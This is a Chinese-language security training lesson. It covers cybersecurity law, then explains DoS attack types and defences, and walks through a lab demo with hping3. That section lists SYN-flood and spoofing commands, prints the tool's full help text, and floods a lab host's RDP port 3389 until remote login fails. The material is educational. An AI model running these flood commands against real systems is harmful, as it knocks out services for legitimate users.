1024我来利用DOS攻击你的电脑了?(第十三课)
本文章设计安全领域的重点问题 学习本文章时 请扎在初学者的角度学习 用于正途
一 国家安全法
1 安全法律法规
《宪法》中的相关规定
案例: 大山破解同事小美私人邮箱密码,读取其往来邮件 邮箱管理员大山根据人事部门要求,下载离职员工小美的企业邮箱邮件
《刑法》中的相关规定
案例1:非法获取计算机信息系统数据、非法控制计算机信息系统、提供非法控制计算机信息系统程序案 12309中国检察网 案例2:百度一员工心生不满"删库"被判刑,法院:构成破坏计算机信息系统罪百度一员工心生不满"删库"被判刑,法院:构成破坏计算机信息系统罪|微盟|百度公司|服务器_网易订阅
《网络安全法》中的相关规定
案例:深圳宝安一企业遭黑客入侵,报案反被行政警告处罚,网警这样说 百度安全验证
2 其他法律法规和部门规章
1)行政法规 《电信条例》 《计算机信息网络国际互联网管理暂行规定》 《计算机信息网络国际联网安全保护管理办法》 《互联网信息服务管理办法》
2)部门规章 《中国互联网域名管理办法》(原信产部) 《互联网IP地址备案管理办法》(原信产部) 《电子认证服务管理办法》(原信产部) 《互联网电子邮件服务管理办法》(原信产部) 《互联网安全保护技术措施规定》(公安部) 《计算机病毒防治管理办法》(公安部) 《信息安全等级保护管理办法》(公安部) 《计算机信息系统安全保护条例》(公安部) 《计算机信息系统国际互联网保密管理规定》(保密局)
3 网络安全法
1)网络安全法的五个方面(七章七十九条)
-网络安全支持与促进
-网络运行安全 -关键信息基础设施的运行安全 -网络信息安全 -检测预警与应急处置
[http://www.npc.gov.cn/npc/c30834/201611/270b43e8b35e4f7ea98502b6f0e26f8a.shtml
2)等级保护制度
网络安全法第二十一条 :国家实行网络安全等级保护制度
安全保护义务包括: 制定内部安全管理制度和操作规程,确定网络安全负责人,落实网络安全保护责任; 采取防护计算机病毒和网络攻击、网络侵入等危害网络安全行为的技术措施; 采取监测、记录网络运行状态、网络安全事件的技术措施,并按照规定留存相关的网络日志不少于六个月; 采取数据分类、重要数据备份和加密等措施; 法律、行政法规规定的其他义务。
二 DOS 攻击的流程介绍
1 DOS攻击的定义?
DOS攻击(Denial of Service Attack)指的是一种恶意攻击,攻击者通过占用或者破坏网络资源,使得合法用户无法正常访问服务的行为。攻击者通常会通过向目标主机或网络发送大量的请求或数据包,以使目标主机或网络超负荷或崩溃。DOS攻击是网络攻击中常见的一种攻击方式,也是网络安全领域中重要的研究方向之一。
2 DOS 如何攻击的?
-
SYN Flood攻击:攻击者向目标系统发送大量的TCP连接请求,而在目标系统返回确认应答前,攻击者却不继续发送确认信息,从而使得目标系统处于等待状态,耗尽其连接资源,无法为合法用户提供服务。
-
ICMP攻击:攻击者向目标系统发送大量的ICMP请求,使得目标系统的网络带宽资源被极度耗尽,从而使得合法用户无法正常访问。
-
UDP Flood攻击:攻击者向目标系统发送大量无效的UDP包,从而导致目标系统的网络带宽资源被耗尽,无法为合法用户提供服务。
-
HTTP Flood攻击:攻击者利用客户端程序和蠕虫病毒控制的计算机,不停地向目标系统的WEB服务器发送合法的HTTP请求,消耗其网络带宽资源和CPU负荷,使得目标系统无法处理正常的请求。
3 Dos改如何去防御。
DDoS(分布式拒绝服务攻击)是一种更高级的攻击方式,通过利用多个分布式计算机的联合攻击,更加难以预测和应对。因此,许多企业和组织都选择使用第三方服务提供商的DDoS保护服务。这些服务提供商将监控网络流量、筛选出可疑数据包,并阻止它们进入被攻击系统。这些服务还可以提供实时报告,以帮助您了解攻击的类型和来源。
限制网络流量
为了防止DoS攻击,可以限制网络流量,阻止流量过载目标服务器。例如,可以使用防火墙、入侵检测系统(IDS)和入侵防御系统(IPS)来过滤出来自已知攻击源的数据包,或者限制网站访问流量,以减轻攻击的影响。
加强授权访问和认证控制
攻击者可能会利用开放的网络服务漏洞,通过大量的非授权访问请求来进行DoS攻击。因此,加强授权访问和认证控制是一种有效的防御DoS攻击的方法。例如,可以通过VPN、IP白名单或基于角色的访问控制来限制对特定资源的访问。
加强系统容错性和恢复能力
在遭受DoS攻击时,系统容错性和恢复能力非常重要。在设计和实施网络架构时,应该考虑到容错性和恢复能力,例如使用负载均衡器、故障切换和备份系统等。
4 DOS 案例演示 让所有的主机不能远程
1 开始DOS 之前的测试
2 开始攻击 利用hping3 工具
*****以下是hping3工具的使用详细介绍,需要注意的是,在使用hping3时,必须遵守国家法律法规,不要用于非法活动。
hping3是一款流量发生工具,适用于网络安全测试、网络管理和网络开发等领域。它可以用来检查网络设备的可用性、测试网络服务器的抗压性功能,以及执行各种类型的网络攻击。
下面是hping3工具的使用详细介绍:
1.基本使用
通过hping3可以发送各种类型的流量包,如TCP、UDP、ICMP等。以下是一些基本的示例命令:
- TCP SYN扫描
hping3 -S IP地址
- Ping扫描
hping3 -1 IP地址
- UDP扫描
hping3 -2 IP地址 -p 端口号
- TCP ACK扫描
hping3 -A IP地址 -p 端口号
2.高级使用
除了基本的功能外,hping3还提供了一些高级的功能:
- 发送任意数据
hping3 -d 数据长度 IP地址 -p 端口号 -S
- 发送ICMP数据
hping3 -1 IP地址 --icmp-code 8
- 发送TCP数据包
hping3 -S IP地址 -p 端口号 -d 数据长度 --ack
3.攻击功能
hping3还提供了一些攻击功能,例如DOS攻击和网络欺骗:
- DOS攻击
hping3 --flood IP地址
- 网络欺骗
hping3 --spoof IP地址 -a 目标IP地址 -p 目标端口号 --icmp
hping3是一款高级的命令行网络扫描器和数据包生成器。它可用于对网络设备进行测试,探测端口和服务以及在网络上模拟攻击。以下是hping3工具的使用详细介绍和具体案例:
1.基本用法
使用hping3时,可以为其设置各种选项和参数,以实现不同的目标。以下是一些常见的选项:
-i :设置发送数据包的时间间隔。
-c :设置要发送的数据包数量。
-p :指定目标端口号。
-S :设置TCP SYN标志。
-w :设置超时时间。
示例:发送10个SYN包到目标主机的端口80上。
`hping3 -c 10 -S -p 80 target_ip`
- 测试网络带宽
可以使用hping3测试网络带宽,这对诊断网络瓶颈非常有用。以下是一个示例,该示例发送大量的UDP数据包到目标主机地址上:
hping3 -S -P -U --flood -V -d 1200 -w 64 -p 8000 target_ip`
`
- 模拟DDoS攻击
使用hping3可以模拟DDoS攻击,验证网络设备的稳定性和可靠性。以下是一个示例,该示例向目标主机发送大量的SYN包:
hping3 -S -a source_ip -p 80 --flood target_ip
- 探测网络主机信息
使用hping3可以探测网络主机的IP地址、开放的端口和服务。以下是一个示例,该示例扫描目标主机的80端口:
hping3 -S -p 80 target_ip
- 使用TCP Ping进行探测
使用TCP Ping可以轻松探测网络主机上的TCP端口是否可用。以下是一个示例,该示例检查目标主机的80端口是否开放:
hping3 -c 1 -S -p 80 target_ip
hping3 192.168.10.142 --syn --flood -p 3389
3 3389
3389 是远程桌面协议(RDP)的默认端口号。RDP是一种远程访问协议,可让用户通过网络远程控制远程计算机。当用户使用远程桌面连接软件连接到目标计算机时,连接将使用3389端口进行通信。
4 Hping3 功能详细介绍
hping3是一款非常强大的网络探测和攻击工具,它可以用于探测远程主机的IP地址,扫描开放的端口,测试网络的性能和安全性,以及进行各种类型的攻击。它支持TCP、UDP、ICMP等多种协议,并且具有高度的灵活性和可自定义性。不过,需要注意的是,hping3的使用需要谨慎,因为它也可以被黑客用于进行网络攻击和侵入。
Haskell
──(root㉿kali)-[~]
└─# hping3 -help
usage: hping3 host [options]
-h --help show this help
-v --version show version
-c --count packet count
-i --interval wait (uX for X microseconds, for example -i u1000)
--fast alias for -i u10000 (10 packets for second)
--faster alias for -i u1000 (100 packets for second)
--flood sent packets as fast as possible. Don't show replies.
-n --numeric numeric output
-q --quiet quiet
-I --interface interface name (otherwise default routing interface)
-V --verbose verbose mode
-D --debug debugging info
-z --bind bind ctrl+z to ttl (default to dst port)
-Z --unbind unbind ctrl+z
--beep beep for every matching packet received
Mode
default mode TCP
-0 --rawip RAW IP mode
-1 --icmp ICMP mode
-2 --udp UDP mode
-8 --scan SCAN mode.
Example: hping --scan 1-30,70-90 -S www.target.host
-9 --listen listen mode
IP
-a --spoof spoof source address
--rand-dest random destionation address mode. see the man.
--rand-source random source address mode. see the man.
-t --ttl ttl (default 64)
-N --id id (default random)
-W --winid use win* id byte ordering
-r --rel relativize id field (to estimate host traffic)
-f --frag split packets in more frag. (may pass weak acl)
-x --morefrag set more fragments flag
-y --dontfrag set don't fragment flag
-g --fragoff set the fragment offset
-m --mtu set virtual mtu, implies --frag if packet size > mtu
-o --tos type of service (default 0x00), try --tos help
-G --rroute includes RECORD_ROUTE option and display the route buffer
--lsrr loose source routing and record route
--ssrr strict source routing and record route
-H --ipproto set the IP protocol field, only in RAW IP mode
ICMP
-C --icmptype icmp type (default echo request)
-K --icmpcode icmp code (default 0)
--force-icmp send all icmp types (default send only supported types)
--icmp-gw set gateway address for ICMP redirect (default 0.0.0.0)
--icmp-ts Alias for --icmp --icmptype 13 (ICMP timestamp)
--icmp-addr Alias for --icmp --icmptype 17 (ICMP address subnet mask)
--icmp-help display help for others icmp options
UDP/TCP
-s --baseport base source port (default random)
-p --destport [+][+]<port> destination port(default 0) ctrl+z inc/dec
-k --keep keep still source port
-w --win winsize (default 64)
-O --tcpoff set fake tcp data offset (instead of tcphdrlen / 4)
-Q --seqnum shows only tcp sequence number
-b --badcksum (try to) send packets with a bad IP checksum
many systems will fix the IP checksum sending the packet
so you'll get bad UDP/TCP checksum instead.
-M --setseq set TCP sequence number
-L --setack set TCP ack
-F --fin set FIN flag
-S --syn set SYN flag
-R --rst set RST flag
-P --push set PUSH flag
-A --ack set ACK flag
-U --urg set URG flag
-X --xmas set X unused flag (0x40)
-Y --ymas set Y unused flag (0x80)
--tcpexitcode use last tcp->th_flags as exit code
--tcp-mss enable the TCP MSS option with the given value
--tcp-timestamp enable the TCP timestamp option to guess the HZ/uptime
Common
-d --data data size (default is 0)
-E --file data from file
-e --sign add 'signature'
-j --dump dump packets in hex
-J --print dump printable characters
-B --safe enable 'safe' protocol
-u --end tell you when --file reached EOF and prevent rewind
-T --traceroute traceroute mode (implies --bind and --ttl 1)
--tr-stop Exit when receive the first not ICMP in traceroute mode
--tr-keep-ttl Keep the source TTL fixed, useful to monitor just one hop
--tr-no-rtt Don't calculate/show RTT information in traceroute mode
ARS packet description (new, unstable)
--apd-send Send the packet described with APD (see docs/APD.txt)
5 发动攻击
5.1 hping3 192.168.10.142 --syn --flood -p 3389
无法远程连接